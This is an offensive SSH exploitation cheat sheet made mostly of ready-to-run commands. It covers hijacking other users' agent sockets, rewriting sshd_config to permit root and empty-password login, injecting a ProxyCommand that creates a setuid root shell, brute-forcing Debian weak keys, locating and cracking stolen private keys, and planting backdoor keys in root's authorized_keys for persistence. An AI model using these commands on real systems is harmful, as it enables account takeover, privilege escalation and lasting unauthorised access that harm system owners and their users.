SSH Exploitation

SSH Agent Forwarding Hijack

If another user has SSH agent forwarding enabled, you can use their agent socket to authenticate as them to remote hosts.

Find Active Agent Sockets

find /tmp -name "agent.*" -type s 2>/dev/null
ls -la /tmp/ssh-*/

Identify Socket Owner

# Find which process owns the socket
lsof /tmp/ssh-XXXXXXXX/agent.YYYY 2>/dev/null

# Or check environment of SSH processes
grep -z SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'

Hijack Agent

export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.YYYY
ssh-add -l

If keys listed → you can use them:

ssh root@internal-server
ssh admin@other-host

Automate Discovery

for sock in $(find /tmp -name "agent.*" -type s 2>/dev/null); do
    export SSH_AUTH_SOCK=$sock
    keys=$(ssh-add -l 2>/dev/null)
    if [ $? -eq 0 ]; then
        echo "=== $sock ==="
        echo "$keys"
    fi
done

Writable SSH Config

/etc/ssh/sshd_config

ls -la /etc/ssh/sshd_config

If writable — enable root login:

PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes

Reload:

systemctl reload sshd

~/.ssh/authorized_keys

If writable for another user:

ls -la /home/*/.ssh/authorized_keys
ls -la /root/.ssh/authorized_keys 2>/dev/null

Add your key:

ssh-keygen -t ed25519 -f /tmp/key -N ""
echo "$(cat /tmp/key.pub)" >> /root/.ssh/authorized_keys
ssh -i /tmp/key root@localhost

~/.ssh/config

If writable — inject ProxyCommand:

Host *
    ProxyCommand /bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'

Triggers on next SSH connection by that user.

Debian Weak Keys (CVE-2008-0166)

Debian OpenSSL bug generated only 32,768 possible keys.

Check

cat /etc/debian_version
# Affected: Debian 4.0 (Etch), Ubuntu 7.04-8.04

Exploit

Download pre-generated keys:

https://github.com/g0tmi1k/debian-ssh

Try each key against target:

for key in rsa/2048/*.pub; do
    ssh -i ${key%.pub} -o BatchMode=yes root@TARGET 2>/dev/null && echo "FOUND: $key"
done

SSH Private Keys on Disk

Find Keys

find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "id_dsa" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null | grep -i ssh

Check Permissions (Readable?)

ls -la /home/*/.ssh/id_* 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null

Use Found Key

chmod 600 stolen_key
ssh -i stolen_key user@TARGET

Crack Passphrase

If key is encrypted:

ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

SSH Persistence

Add Key to Root

mkdir -p /root/.ssh
echo "ssh-ed25519 AAAA... attacker@host" >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

Generate Key Pair on Target

ssh-keygen -t ed25519 -f /root/.ssh/backdoor -N ""
cat /root/.ssh/backdoor  # Copy private key to attacker
echo "$(cat /root/.ssh/backdoor.pub)" >> /root/.ssh/authorized_keys

Quick Reference

Technique	Requirement
Agent forwarding hijack	Active SSH agent socket accessible
Writable authorized_keys	Write access to ~/.ssh/
Writable sshd_config	Write access to /etc/ssh/
Debian weak keys	Debian Etch / Ubuntu 7-8
Private key theft	Readable key files

Documentation Index

​SSH Agent Forwarding Hijack

​Find Active Agent Sockets

​Identify Socket Owner

​Hijack Agent

​Automate Discovery

​Writable SSH Config

​/etc/ssh/sshd_config

​~/.ssh/authorized_keys

​~/.ssh/config

​Debian Weak Keys (CVE-2008-0166)

​Check

​Exploit

​SSH Private Keys on Disk

​Find Keys

​Check Permissions (Readable?)

​Use Found Key

​Crack Passphrase

​SSH Persistence

​Add Key to Root

​Generate Key Pair on Target

​Quick Reference